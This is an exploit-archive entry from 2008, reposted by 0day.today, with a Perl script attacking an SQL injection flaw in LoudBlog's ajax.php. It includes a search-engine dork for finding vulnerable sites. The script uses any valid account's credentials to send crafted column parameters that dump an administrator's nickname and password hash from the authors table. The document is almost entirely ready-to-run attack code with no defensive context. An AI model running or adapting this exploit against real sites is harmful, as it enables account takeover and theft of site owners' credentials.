LoudBlog <= 0.8.0a (ajax.php) SQL Injection Vulnerability (auth)

ID 1337DAY-ID-3932
Type zdt
Reporter Xianur0
Modified 2008-10-22T00:00:00


Exploit for unknown platform in category web applications

LoudBlog <= 0.8.0a (ajax.php) SQL Injection Vulnerability (auth)

# This Exploit requires a valid user name and password of an account regardless of the permissions
# Author: Xianur0
# Affected: All Versions
# Bug: SQL Injection
# Doorks:
#  allintext: "powered by LoudBlog"

  use HTTP::Request::Common qw(POST);
  use LWP::UserAgent;
  use Digest::MD5 qw(md5_hex);
  $ua = LWP::UserAgent->new;

print "\n             LoudBlog Exploit All Version By Xianur0\n\n";
$uri = $ARGV[0];
$id = $ARGV[1];
$password = $ARGV[3] || die("\nUse: loudblog.pl [URI] [ID Admin] [Valid User] [Valid Password]\n");
$md5 = md5_hex($ARGV[2]).":".md5_hex($password);

  my $req = POST $uri.'/loudblog/ajax.php',
                [ colpick => "concat(0x557365723a20,nickname,0x0d0a50617373776f72643a20,password)", rowpick => "id", rowval => $id, table => 'authors', action => 'singleread'];
$req->header('User-Agent' => 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/20080829 Firefox/');
$req->header('Cookie' => 'lbauth='.$md5);
$res = $ua->request($req);
  print $res->content."\n"; 

#  0day.today [2018-01-09]  #